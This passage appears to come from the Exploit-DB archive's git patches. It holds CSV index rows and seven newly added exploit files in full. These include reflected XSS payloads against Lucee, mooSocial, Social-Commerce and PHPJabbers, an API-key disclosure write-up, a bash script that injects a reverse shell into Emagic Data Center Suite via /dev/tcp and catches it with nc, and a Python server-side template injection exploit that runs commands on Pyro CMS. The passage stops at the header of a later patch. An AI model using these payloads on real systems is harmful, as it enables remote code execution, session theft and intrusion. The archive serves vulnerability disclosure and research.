 39301,exploits/php/webapps/39301.html,"WordPress Plugin Ninja Forms 2.7.7 - Authentication Bypass",2014-09-08,Voxel@Night,webapps,php,,2014-09-08,2016-01-24,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/69740/info
 45234,exploits/php/webapps/45234.txt,"WordPress Plugin Ninja Forms 3.3.13 - CSV Injection",2018-08-21,"Mostafa Gharzi",webapps,php,,2018-08-21,2018-08-21,0,,,,,,
 45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,80,2018-11-15,2018-11-20,0,CVE-2018-19287,"Cross-Site Scripting (XSS)",,,,
+51644,exploits/php/webapps/51644.py,"WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS",2023-08-04,"Mehran Seifalinia",webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-37979,,,,,
 50455,exploits/php/webapps/50455.txt,"WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)",2021-10-25,"Akash Patil",webapps,php,,2021-10-25,2021-10-25,0,,,,,http://www.exploit-db.comninja-tables.4.1.7.zip,
 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php,,2015-06-05,2015-06-24,1,CVE-2012-3577;OSVDB-82792,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53790/info
 28485,exploits/php/webapps/28485.txt,"WordPress Plugin NOSpamPTI - Blind SQL Injection",2013-09-23,"Alexandro Silva",webapps,php,,2013-09-23,2013-09-23,0,CVE-2013-5917;OSVDB-97528,"WordPress Plugin",,,http://www.exploit-db.comnospampti.zip,
@@ -39044,6 +39067,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36071,exploits/windows/dos/36071.py,"Xlight FTP Server 3.7 - Remote Buffer Overflow",2011-08-19,KedAns-Dz,dos,windows,,2011-08-19,2015-02-14,1,,,,,,https://www.securityfocus.com/bid/49255/info
 43135,exploits/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,dos,windows,,2017-11-13,2017-11-13,1,,,,http://www.exploit-db.com/screenshots/idlt43500/screen-shot-2017-11-13-at-194303.png,http://www.exploit-db.comsetup.exe,
 46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,,2019-02-25,2019-02-25,0,,,,,http://www.exploit-db.comsetup-x64.exe,
+51665,exploits/windows/dos/51665.py,"Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)",2023-08-04,"Yehia Elghaly",dos,windows,,2023-08-04,2023-08-04,0,,,,,,
 10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",dos,windows,515,2009-10-05,,1,OSVDB-58727,,,,,
 10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,dos,windows,21,2009-10-01,2011-04-27,1,,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,
 10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,dos,windows,21,2009-11-12,,1,CVE-2009-4108;CVE-2009-4048;OSVDB-60494,,,,http://www.exploit-db.comxm_ftp_server_5.8.0.exe,

From 69f3ee7722635417f30d40dab5b75bdb983d36be Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Wed, 9 Aug 2023 00:16:24 +0000
Subject: [PATCH 04/17] DB: 2023-08-09

8 changes to exploits/shellcodes/ghdb

Lucee 5.4.2.17 - Authenticated Reflected XSS

Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure

Emagic Data Center Management Suite v6.0 - OS Command Injection

mooSocial 3.1.8 - Reflected XSS

PHPJabbers Vacation Rental Script 4.0 - CSRF

Social-Commerce 3.1.6 - Reflected XSS

Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
---
 exploits/multiple/webapps/51668.txt | 39 +++++++++++++++
 exploits/php/webapps/51667.txt      | 49 +++++++++++++++++++
 exploits/php/webapps/51670.txt      | 38 +++++++++++++++
 exploits/php/webapps/51671.txt      | 51 ++++++++++++++++++++
 exploits/php/webapps/51672.txt      | 32 ++++++++++++
 exploits/php/webapps/51673.sh       | 49 +++++++++++++++++++
 exploits/python/webapps/51669.txt   | 75 +++++++++++++++++++++++++++++
 files_exploits.csv                  |  7 +++
 8 files changed, 340 insertions(+)
 create mode 100644 exploits/multiple/webapps/51668.txt
 create mode 100644 exploits/php/webapps/51667.txt
 create mode 100644 exploits/php/webapps/51670.txt
 create mode 100644 exploits/php/webapps/51671.txt
 create mode 100644 exploits/php/webapps/51672.txt
 create mode 100755 exploits/php/webapps/51673.sh
 create mode 100644 exploits/python/webapps/51669.txt

diff --git a/exploits/multiple/webapps/51668.txt b/exploits/multiple/webapps/51668.txt
new file mode 100644
index 0000000000..ed649f926b
--- /dev/null
+++ b/exploits/multiple/webapps/51668.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Lucee 5.4.2.17 - Authenticated Reflected XSS
+# Google Dork: NA
+# Date: 05/08/2023
+# Exploit Author: Yehia Elghaly
+# Vendor Homepage: https://www.lucee.org/
+# Software Link: https://download.lucee.org/
+# Version: << 5.4.2.17
+# Tested on: Windows 10
+# CVE: N/A
+
+
+Summary: Lucee is a light-weight dynamic CFML scripting language with a solid foundation.Lucee is a high performance, open source, ColdFusion / CFML server engine, written in Java.
+
+Description: The attacker can able to convince a victim to visit a malicious URL, can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
+
+The payload: ?msg=<img src=xss onerror=alert('xssya')>
+http://172.16.110.130:8888/lucee/admin/server.cfm?action=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E
+
+POST /lucee/admin/web.cfm?action=services.gateway&action2=create HTTP/1.1
+Host: 172.16.110.130:8888
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+Origin: http://172.16.110.130:8888
+Connection: close
+Referer: http://172.16.110.130:8888/lucee/admin/web.cfm?action=services.gateway&action2=create
+Cookie: cfid=ee75e255-5873-461d-a631-0d6db6adb066; cftoken=0; LUCEE_ADMIN_LANG=en; LUCEE_ADMIN_LASTPAGE=overview
+Upgrade-Insecure-Requests: 1
+
+name=AsynchronousEvents&class=&cfcPath=lucee.extension.gateway.AsynchronousEvents&id=a&_id=a&listenerCfcPath=lucee.extension.gateway.AsynchronousEventsListener&startupMode=automatic&custom_component=%3Fmsg%3D%3Cimg+src%3Dxss+onerror%3Dalert%28%27xssya%27%29%3E&mainAction=submit
+
+[Affected Component]
+Debugging-->Template
+Service --> Search
+Services  --> Event Gateway
+Service --> Logging
\ No newline at end of file
diff --git a/exploits/php/webapps/51667.txt b/exploits/php/webapps/51667.txt
new file mode 100644
index 0000000000..bb3c800d3a
--- /dev/null
+++ b/exploits/php/webapps/51667.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure
+# Exploit Author: CraCkEr
+# Date: 25/07/2023
+# Vendor: Templatecookie
+# Vendor Homepage: https://templatecookie.com/
+# Software Link: https://templatecookie.com/demo/adlisting-classified-ads-script
+# Version: 2.14.0
+# Tested on: Windows 10 Pro
+# Impact: Sensitive Information Leakage
+# CVE: CVE-2023-4168
+
+
+## Description
+
+Information disclosure issue in the redirect responses, When accessing any page on the website,
+Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.
+
+
+## Steps to Reproduce:
+
+When you visit any page on the website, like:
+
+https://website/ad-list?category=electronics
+https://website/ad-list-search?page=2
+https://website/ad-list-search?keyword=&lat=&long=&long=&lat=&location=&category=&keyword=
+
+in the body page response there's information leakage for
+
++---------------------+
+google_map_key
+api_key
+auth_domain
+project_id
+storage_bucket
+messaging_sender_id
+app_id
+measurement_id
++---------------------+
+
+
+Note: The same information leaked, such as the API keys, server keys, and app ID, was added to the "Firebase Push Notification Configuration" in the Administration Panel.
+
+Settings of "Firebase Push Notification Configuration" in the Administration Panel, on this Path:
+
+https://website/push-notification (Login as Administrator)
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51670.txt b/exploits/php/webapps/51670.txt
new file mode 100644
index 0000000000..3ff76f3cf7
--- /dev/null
+++ b/exploits/php/webapps/51670.txt
@@ -0,0 +1,38 @@
+# Exploit Title: mooSocial 3.1.8 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: mooSocial
+# Vendor Homepage: https://moosocial.com/
+# Software Link: https://travel.moosocial.com/
+# Version: 3.1.8
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4173
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+URL path folder is vulnerable to XSS
+
+https://website/classifieds[XSS]/search?category=1
+
+https://website/classifieds/search[XSS]?category=1
+
+
+XSS Payloads:
+
+ijz3y"><img src=a onerror=alert(1)>y4apk
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51671.txt b/exploits/php/webapps/51671.txt
new file mode 100644
index 0000000000..03cc4db525
--- /dev/null
+++ b/exploits/php/webapps/51671.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Social-Commerce 3.1.6 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: mooSocial
+# Vendor Homepage: https://moosocial.com/
+# Software Link: https://social-commerce.moosocial.com/
+# Version: 3.1.6
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4174
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /search/index
+
+GET parameter 'q' is vulnerable to XSS
+
+https://website/search/index?q=[XSS]
+
+
+URL path folder [1,2] is vulnerable to XSS
+
+https://website/stores[XSS]/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent
+
+https://website/user_info[XSS]/index/friends
+
+https://website/user_info/index[XSS]/friends
+
+https://website/faqs[XSS]/index?content_search=
+
+https://website/faqs/index[XSS]?content_search=
+
+
+
+XSS Payloads:
+
+j8chn"><img src=a onerror=alert(1)>ridxm
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51672.txt b/exploits/php/webapps/51672.txt
new file mode 100644
index 0000000000..4ec7210317
--- /dev/null
+++ b/exploits/php/webapps/51672.txt
@@ -0,0 +1,32 @@
+# Exploit Title: PHPJabbers Vacation Rental Script 4.0 - CSRF
+# Date: 05/08/2023
+# Exploit Author: Hasan Ali YILDIR
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/vacation-rental-script/
+# Version: 4.0
+# Tested on: Windows 10 Pro
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Technical Detail / POC
+
+==========================
+
+1. Login Account
+2. Go to Property Page (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
+3. Edit Any Property (https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21)
+
+
+[1] Cross-Site Request Forgery
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><font%20color="red">CSRF%20test</font>
+
+[2] Cross-Site Scripting (XSS)
+
+Request:
+https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=21&tab="<script><image/src/onerror=prompt(8)>
\ No newline at end of file
diff --git a/exploits/php/webapps/51673.sh b/exploits/php/webapps/51673.sh
new file mode 100755
index 0000000000..f237c64a63
--- /dev/null
+++ b/exploits/php/webapps/51673.sh
@@ -0,0 +1,49 @@
+#!/bin/bash
+
+# Exploit Title: Emagic Data Center Management Suite v6.0 - OS Command Injection
+# Date: 03-08-2023
+# Exploit Author: Shubham Pandey & thewhiteh4t
+# Vendor Homepage: https://www.esds.co.in/enlight360
+# Version: 6.0.0
+# Tested on: Kali Linux
+# CVE : CVE-2023-37569
+
+URL=$1
+LHOST=$2
+LPORT=$3
+
+echo "*****************************"
+echo "*  ESDS eMagic 6.0.0 RCE    *"
+echo "*  > CVE-2023-37569         *"
+echo "*  > Shubham & thewhiteh4t  *"
+echo "*****************************"
+
+if [ $# -lt 3 ]; then
+    echo """
+USAGE :
+
+./exploit.sh http://<IP> <LHOST> <LPORT>
+./exploit.sh http://192.168.0.10 192.168.0.20 1337
+"""
+    exit 1
+fi
+
+url="$1/index.php/monitor/operations/utilities/"
+
+echo "[+] URL   : $URL"
+echo "[+] LHOST : $LHOST"
+echo "[+] LPORT : $LPORT"
+echo
+
+payload="bash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%27"
+
+post_data="utility=ping&operations=yes&hostname=%3B%20$payload&param_before=&param_after=&probe_id=1&rndval=1682490204846"
+
+echo "[!] Triggering exploit..."
+
+echo $url
+
+(sleep 3; curl -s -X POST -d $post_data $url > /dev/null) &
+
+echo "[+] Catching shell..."
+nc -lvp 4444
\ No newline at end of file
diff --git a/exploits/python/webapps/51669.txt b/exploits/python/webapps/51669.txt
new file mode 100644
index 0000000000..5d6c854200
--- /dev/null
+++ b/exploits/python/webapps/51669.txt
@@ -0,0 +1,75 @@
+# Exploit Title: Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)
+# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
+# Date: 03/08/2023
+# Vendor: https://pyrocms.com/
+# Software Link: https://pyrocms.com/documentation/pyrocms/3.9/getting-started/installation
+# Vulnerable Version(s): 3.9
+# CVE: CVE-2023-29689
+# Notes: You need a user who has access to /admin privilege
+
+# Example Usage:
+# First, run the script: python3 CVE-2023-29689.py
+# Please follow these steps:
+# 1. Enter the application URL: http://localhost:8000
+# 2. Enter the email for authentication: admin@adm.com
+# 3. Enter the password: Admin@@2023
+# 4. Enter the command to be executed: id
+# Result of command execution:
+# uid=1000(cupcake) gid=1000(cupcake) groups=1000(cupcake)
+
+import requests
+from bs4 import BeautifulSoup
+from urllib.parse import urljoin
+
+def login(session, url, email, password):
+    login_url = urljoin(url, '/admin/login')
+    response = session.get(login_url)
+    soup = BeautifulSoup(response.content, 'html.parser')
+    token = soup.find('input', {'name': '_token'})['value']
+
+    payload = {
+        '_token': token,
+        'email': email,
+        'password': password
+    }
+
+    session.post(login_url, data=payload)
+
+# Function to edit role 1 and extract the Description of the Admin user.
+def edit_role_and_extract_description(session, url, command):
+    edit_role_url = urljoin(url, '/admin/users/roles/edit/1')
+    response = session.get(edit_role_url)
+    soup = BeautifulSoup(response.content, 'html.parser')
+    token = soup.find('input', {'name': '_token'})['value']
+
+    payload = {
+        '_token': token,
+        'name_en': 'Admin',
+        'slug': 'admin',
+        'description_en': f'{{{{["{command}"]|map("system")|join}}}}',
+        'action': 'save_exit'
+    }
+
+    session.post(edit_role_url, data=payload)
+
+    # Extract the updated Description from role 1.
+    response = session.get(urljoin(url, '/admin/users/roles'))
+    soup = BeautifulSoup(response.content, 'html.parser')
+    description = soup.find('td', {'data-title': 'Description'}).text.strip()
+
+    return description
+
+def main():
+    url = input("Enter the application URL: ")
+    email = input("Enter the email for authentication: ")
+    password = input("Enter the password : ")
+    command = input("Enter the command to be executed: ")
+
+    with requests.Session() as session:
+        login(session, url, email, password)
+        description = edit_role_and_extract_description(session, url, command)
+        print("\nResult of command execution:")
+        print(description)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cb511e66fe..e6ec5efa17 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11922,6 +11922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",2021-10-13,"Mert Daş",webapps,multiple,,2021-10-13,2021-10-13,0,,,,,,
 46254,exploits/multiple/webapps/46254.txt,"LogonBox Limited / Hypersocket Nervepoint Access Manager - (Unauthenticated) Insecure Direct Object Reference",2019-01-28,0v3rride,webapps,multiple,,2019-01-28,2019-03-16,0,CVE-2019-6716,,,,,
 49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",2021-06-01,g0ldm45k,webapps,multiple,,2021-06-01,2021-06-01,0,CVE-2018-16167,,,,http://www.exploit-db.comLogonTracer-1.2.0.zip,
+51668,exploits/multiple/webapps/51668.txt,"Lucee 5.4.2.17 - Authenticated Reflected XSS",2023-08-08,"Yehia Elghaly",webapps,multiple,,2023-08-08,2023-08-08,0,,,,,,
 46404,exploits/multiple/webapps/46404.py,"M/Monit 3.7.2 - Privilege Escalation",2019-02-18,"Dolev Farhi",webapps,multiple,,2019-02-18,2019-02-18,0,,,,,http://www.exploit-db.commmonit-3.7.2-linux-x86.tar.gz,
 49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
 49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
@@ -13465,6 +13466,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,,2019-11-08,2019-11-08,0,CVE-2019-14347,,,,,
 47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php,,2020-01-28,2020-02-03,1,CVE-2020-7991,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comadive-php7-master.zip,
 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php,,2020-01-20,2020-01-20,0,,,,,,
+51667,exploits/php/webapps/51667.txt,"Adlisting Classified Ads 2.14.0 - WebPage Content Information Disclosure",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,0,CVE-2023-4168,,,,,
 27462,exploits/php/webapps/27462.txt,"AdMan 1.0.20051221 - 'ViewStatement.php' SQL Injection",2003-03-23,r0t,webapps,php,,2003-03-23,2013-08-10,1,CVE-2006-1374;OSVDB-24064,,,,,https://www.securityfocus.com/bid/17208/info
 6702,exploits/php/webapps/6702.txt,"AdMan 1.1.20070907 - 'campaignId' SQL Injection",2008-10-08,SuB-ZeRo,webapps,php,,2008-10-07,2016-12-26,1,OSVDB-48972;CVE-2008-6156,,,,,
 21424,exploits/php/webapps/21424.txt,"ADManager 1.1 - Content Manipulation",2002-04-17,frog,webapps,php,,2002-04-17,2012-09-21,1,OSVDB-86912,,,,,https://www.securityfocus.com/bid/4615/info
@@ -17784,6 +17786,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36406,exploits/php/webapps/36406.txt,"Elxis CMS 2009 - 'index.php?task' Cross-Site Scripting",2011-12-05,"Ewerson Guimaraes",webapps,php,,2011-12-05,2015-03-16,1,CVE-2011-4918;OSVDB-77563,,,,,https://www.securityfocus.com/bid/50910/info
 15939,exploits/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote File Inclusion",2011-01-08,n0n0x,webapps,php,,2011-01-08,2011-01-08,0,,,,,http://www.exploit-db.comelxis_2009.2_electra_rev2631.zip,
 15647,exploits/php/webapps/15647.txt,"Elxis CMS 2009.2 - SQL Injection",2010-11-30,"High-Tech Bridge SA",webapps,php,,2010-11-30,2010-12-01,1,,,,,http://www.exploit-db.comelxis_2009.2_electra_rev2631.zip,http://www.htbridge.ch/advisory/sql_injection_in_elxis_cms_1.html
+51673,exploits/php/webapps/51673.sh,"Emagic Data Center Management Suite v6.0 - OS Command Injection",2023-08-08,thewhiteh4t,webapps,php,,2023-08-08,2023-08-08,0,CVE-2023-37569,,,,,
 46076,exploits/php/webapps/46076.txt,"Embed Video Scripts - Persistent Cross-Site Scripting",2019-01-07,"Deyaa Muhammad",webapps,php,80,2019-01-07,2019-01-07,1,,"Cross-Site Scripting (XSS)",,,,
 35724,exploits/php/webapps/35724.txt,"EmbryoCore 1.03 - 'index.php' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,,2011-05-09,2015-01-08,1,,,,,,https://www.securityfocus.com/bid/47763/info
 37509,exploits/php/webapps/37509.txt,"EmbryoCore CMS 1.03 - 'loadcss.php' Multiple Directory Traversal Vulnerabilities",2012-07-16,"Sammy FORGIT",webapps,php,,2012-07-16,2015-07-07,1,,,,,,https://www.securityfocus.com/bid/54470/info
@@ -23578,6 +23581,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51115,exploits/php/webapps/51115.txt,"Moodle LMS 4.0 - Cross-Site Scripting (XSS)",2023-03-28,"Saud Alenazi",webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 4951,exploits/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' SQL Injection",2008-01-21,The_HuliGun,webapps,php,,2008-01-20,2016-11-14,1,OSVDB-40959;CVE-2008-0424,,,,http://www.exploit-db.commgbs_1.0.zip,
 27871,exploits/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilities",2013-08-26,Esac,webapps,php,,2013-08-26,2013-08-26,0,OSVDB-96633;OSVDB-96632;OSVDB-96631;OSVDB-96630;OSVDB-96629;OSVDB-96628;OSVDB-96627;OSVDB-96626;OSVDB-96625;OSVDB-96624,,,,,
+51670,exploits/php/webapps/51670.txt,"mooSocial 3.1.8 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4173,,,,,
 45330,exploits/php/webapps/45330.txt,"mooSocial Store Plugin 2.6 - SQL Injection",2018-09-04,"Andrea Bocchetti",webapps,php,,2018-09-04,2018-09-06,0,,"SQL Injection (SQLi)",,,,
 9121,exploits/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,webapps,php,,2009-07-09,,1,OSVDB-55796;CVE-2009-3713,,,,,
 2394,exploits/php/webapps/2394.php,"more.groupware 0.74 - 'new_calendarid' SQL Injection",2006-09-19,x128,webapps,php,,2006-09-18,2016-09-09,1,OSVDB-29017;CVE-2006-4906,,,,http://www.exploit-db.commoregroupware-core-0.7.4.tar.gz,
@@ -27011,6 +27015,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51652,exploits/php/webapps/51652.txt,"PHPJabbers Taxi Booking 2.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4116,,,,,
 30953,exploits/php/webapps/30953.txt,"PHPJabbers Vacation Packages Listing 2.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102178;OSVDB-102177;OSVDB-102176,,,,,
 30955,exploits/php/webapps/30955.txt,"PHPJabbers Vacation Rental Script 3.0 - Multiple Vulnerabilities",2014-01-15,HackXBack,webapps,php,80,2014-01-15,2014-01-15,0,OSVDB-102225;OSVDB-102224;OSVDB-102220,,,,,
+51672,exploits/php/webapps/51672.txt,"PHPJabbers Vacation Rental Script 4.0 - CSRF",2023-08-08,"Hasan Ali YILDIR",webapps,php,,2023-08-08,2023-08-08,0,,,,,,
 2775,exploits/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,webapps,php,,2006-11-12,,1,OSVDB-30367;CVE-2006-5928;OSVDB-30366;OSVDB-30365;OSVDB-30364,,,,,
 27004,exploits/php/webapps/27004.txt,"PHPJournaler 1.0 - 'Readold' SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",webapps,php,,2006-01-01,2013-07-22,1,CVE-2006-0066;OSVDB-22149,,,,,https://www.securityfocus.com/bid/16111/info
 35990,exploits/php/webapps/35990.txt,"PHPJunkYard GBook 1.6/1.7 - Multiple Cross-Site Scripting Vulnerabilities",2011-07-27,"High-Tech Bridge SA",webapps,php,,2011-07-27,2015-02-04,1,,,,,,https://www.securityfocus.com/bid/48905/info
@@ -29837,6 +29842,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip,
 33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info
 10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip,
+51671,exploits/php/webapps/51671.txt,"Social-Commerce 3.1.6 - Reflected XSS",2023-08-08,CraCkEr,webapps,php,,2023-08-08,2023-08-08,1,CVE-2023-4174,,,,,
 51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,,
 34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info
 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip,
@@ -34655,6 +34661,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
 51532,exploits/python/webapps/51532.py,"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)",2023-06-14,"Gabriel Lima",webapps,python,,2023-06-20,2023-06-20,1,CVE-2023-0297,,,,,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
+51669,exploits/python/webapps/51669.txt,"Pyro CMS 3.9 - Server-Side Template Injection (SSTI) (Authenticated)",2023-08-08,"Daniel Barros",webapps,python,,2023-08-08,2023-08-08,0,CVE-2023-29689,,,,,
 51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-06-04,1,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,

From f55092b3321555d5c5b7ac69b986eb79ec5ccba1 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Fri, 11 Aug 2023 00:16:25 +0000
Subject: [PATCH 05/17] DB: 2023-08-11

6 changes to exploits/shellcodes/ghdb

TP-Link Archer AX21 - Unauthenticated Command Injection

systemd 246 - Local Privilege Escalation

Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)

Request-Baskets v1.2.1 - Server-side request forgery (SSRF)

OutSystems Service Studio 11.53.30 - DLL Hijacking
---
 exploits/hardware/remote/51677.py | 52 ++++++++++++++++++++++++++++++
 exploits/linux/local/51674.txt    | 17 ++++++++++
 exploits/python/webapps/51675.sh  | 53 +++++++++++++++++++++++++++++++
 exploits/python/webapps/51676.py  | 35 ++++++++++++++++++++
 exploits/windows/local/51678.txt  | 20 ++++++++++++
 files_exploits.csv                |  5 +++
